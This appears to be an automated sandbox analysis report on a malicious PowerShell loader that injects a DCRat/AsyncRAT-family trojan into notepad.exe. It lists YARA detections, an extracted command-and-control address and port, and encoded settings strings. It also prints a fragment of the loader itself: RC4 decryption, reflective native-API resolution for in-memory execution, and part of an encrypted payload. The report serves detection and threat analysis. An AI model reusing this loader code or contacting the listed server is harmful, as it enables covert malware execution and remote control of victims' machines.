Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp |
Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["91.92.252.234"], "Certificate": "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", "Server Signature": "MZCsI864kmIzKFJC44vL3ya3ABqlMaLoEPmnFnwJE3ff3mZPALfgyzyzZ6QEJ/IzBakmLsEJga3Ls/81f/i6c++NCJCFfkeq/72Z5DXypIfIHefvzC/jQJR4Vg3yGUxtv1dmoafcvwBchkK5sy3fwqJ0BXfUgy7iJUDxOUMs50s="} (note: the YARA matches on this same memory region fire the DCRat rules and the DcRatBy string indicator; DCRat reuses the AsyncRAT settings layout, so the extractor label indicates AsyncRAT-lineage configuration, not a definitive AsyncRAT family attribution — treat the C2 host/port as the actionable IOC) |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2299448154.000001F0C81F2000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.2300072444.000001F0CA051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2300072444.000001F0CA051000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: Yara match |
File source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown |
Source: 00000003.00000002.2300760860.000001FEDB6FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: 00000003.00000002.2301419592.000001FEDD421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642523 |
3_2_000001FEDB642523 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642103 |
3_2_000001FEDB642103 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB64295B |
3_2_000001FEDB64295B |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB642DE3 |
3_2_000001FEDB642DE3 |
Source: C:\Windows\System32\notepad.exe |
Code function: 3_2_000001FEDB6414DB |
3_2_000001FEDB6414DB |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 3.2.notepad.exe.1fedd340000.0.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000003.00000002.2300716137.000001FEDB630000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI |
Source: 00000003.00000002.2301362798.000001FEDD340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000000.00000002.2299929784.000001F0C9C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13 |
Source: 00000003.00000002.2300760860.000001FEDB6FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 00000003.00000002.2301419592.000001FEDD421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: Process Memory Space: notepad.exe PID: 3424, type: MEMORYSTR |
Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12 |
Source: 3.2.notepad.exe.1fedd340000.0.raw.unpack, Settings.cs |
Base64 encoded string: 'ZKy9yrztpz7yv3/a1mEzj7LN1ILbjAEngwbJuJN9gXUu2eYPLZGP4ulxSCEkn+5i8r0vJujifi71RwLaW3nyag==', 'ybygf6+agXAHWxflsE7Sr+wxZU6JYC+Pvd1S4RZ5sQSB0NtjWt5QTygoRGp+pMg28vvgeT0Oh4nItVicifUq0Q==', 'qTRhtxKTffPeOJ3knxBmUWWYHCE0+dVGhddRopV3Mlf6RSzuTneF8s4ZbOKqALBC1zmBEqplhVyEj2jpjYyY/g==', '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', 'JNo5eYTTmLScwaJty1FGb9Cw1L5a7Bx99KM5Rb3CC8iFe5FH8A7Y/2uLaJHGoIAHjA+xgAhpsZQf9r6JqLtdXA==', 'HpJFVrfZtMkBQA7PAo91pVXU4D8x7V4+OxVLUsIQtKG2xK+iRXY501yTtQItCuLbDtSXqlxi/mHSeX2jaKPm+w==', 'vJNb45CmzU209S7A3rIKofVdmRiwGIW6iqJmEv0PUpsotSRkfxFRQLZL4KfU1/yWdhvgXAffWTpS6tZKK1shbw==' |
Source: classification engine |
Classification label: mal100.troj.evad.winPS1@4/10@0/0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache |
Source: C:\Windows\System32\notepad.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkawl2pe.cxf.ps1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, 
Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('RZFdLsQoJoqVbbjT0p6FA4g7ie5N4K1RCJ0YAeGhMwRP68LYH7h0FZRO28FkxQaD3ballhhMTLrk6hhPIwKSVacUZXCtb/NX2gT1qSqdKQTapIVAjUN2YAJGDSnR824sM/MaaUxY3mbKw5u0d9gguDpfaGbaUHXRmOu4t/q150qnOkabAJ39uVGPyPoPk6m8a8SEbLZuh |